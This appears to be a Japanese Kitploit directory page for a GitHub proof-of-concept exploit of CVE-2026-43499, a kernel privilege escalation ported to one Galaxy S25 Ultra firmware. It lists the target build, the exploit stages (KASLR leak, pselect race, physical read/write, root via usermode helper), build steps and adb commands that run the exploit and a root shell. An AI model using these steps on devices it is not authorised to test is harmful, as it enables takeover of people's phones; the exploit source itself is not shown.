Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-2026-43499-S25U — Galaxy S25 Ultra SM-S938N S938NKSUACZF1 向けスタンドアロン CVE-2026-43499 PoC | Kitploit
ツール/GitHubGitHub/busung-dev/cve-2026-43499-s25u
Androidセキュリティ特権昇格エクスプロイトポストエクスプロイトレッドチーミングペイロード開発バイナリエクスプロイト
GitHubbusung-dev/cve-2026-43499-s25u

CVE-2026-43499-S25U

Galaxy S25 Ultra SM-S938N S938NKSUACZF1 向けスタンドアロン CVE-2026-43499 PoC

リポジトリを見る
391031ヶ月前Kitploit レビュー済み

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

CVE-2026-43499 Galaxy S25 Ultra向けPoC

韓国Samsung Galaxy S25 Ultra向けのCVE-2026-43499のデバイス固有のProof of Conceptです。

サポート対象

root@kitploit:~
Model: SM-S938N
Codename: pa3q
Android: 16 / API 36
Build: S938NKSUACZF1
Display ID: BP4A.251205.006.S938NKSUACZF1
Fingerprint: samsung/pa3qksx/pa3q:16/BP4A.251205.006/S938NKSUACZF1_OKRACZF1:user/release-keys
Kernel: 6.6.98-android15-8-pd6ff1cd-abogkiS938NKSUACZF1-4k
Architecture: arm64 / 4K pages

上記のファームウェアでのみ有効なオフセットと構造レイアウトです。

参考

この移植は以下に基づいています:

  • NebuSec/CyberMeowfia — IonStack/CVE-2026-43499/exploit
  • アップストリームリビジョン:b850d3bddc74c3328d5fbcc0568d21962b55d949

アップストリームのApache License 2.0はLICENSEに保持されています。

移植の変更点

  • pa3q-S938NKSUACZF1のオフセットとカーネルレイアウトを追加しました。
  • このSamsungカーネル向けにtracefsベースのKASLRスライドリカバリを追加しました。
  • pselect競合、CFI/FOPSステージ、物理読み書きプリミティブを移植しました。
  • デバイス固有のsystem_unbound_wqユーザーモードヘルパールートパスを追加しました。
  • デバイス調整済みのpselect遅延シーケンスを持つ分離されたリトライプロセスを追加しました。
  • 成功後にリクレームされたページを保持し、生きた偽造オブジェクトの再利用を回避します。

ビルド

ANDROID_NDK_HOMEをAndroid NDK r29または互換性のあるツールチェーンに設定してください:

root@kitploit:~
make -j8

出力:

root@kitploit:~
build/cve-2026-43499
build/cve-2026-43499-root

デプロイと実行

root@kitploit:~
adb push build/cve-2026-43499 /data/local/tmp/cve-2026-43499
adb push build/cve-2026-43499-root /data/local/tmp/cve-2026-43499-root
adb shell chmod 755 /data/local/tmp/cve-2026-43499 /data/local/tmp/cve-2026-43499-root
adb shell "LD_PRELOAD=/data/local/tmp/cve-2026-43499 /system/bin/true"
adb shell "/data/local/tmp/cve-2026-43499-root -c 'id'"

このエクスプロイトはデフォルトで16回の独立した試行と20,000マイクロ秒の基本pselect遅延を使用します。タイミングデータ収集時にはこれらを上書きできます:

root@kitploit:~
adb shell "EXPLOIT_ATTEMPTS=24 PSELECT_DELAY_USEC=20000 LD_PRELOAD=/data/local/tmp/cve-2026-43499 /system/bin/true"

一時的なルートセッションと保持された割り当ては再起動まで持続します。

ワンクリックインストールおよびKernelSUサポートには、Root My Galaxyを使用してください。

所有しているデバイス、またはテストする明示的な権限があるデバイスでのみ使用してください。

ツールをダウンロード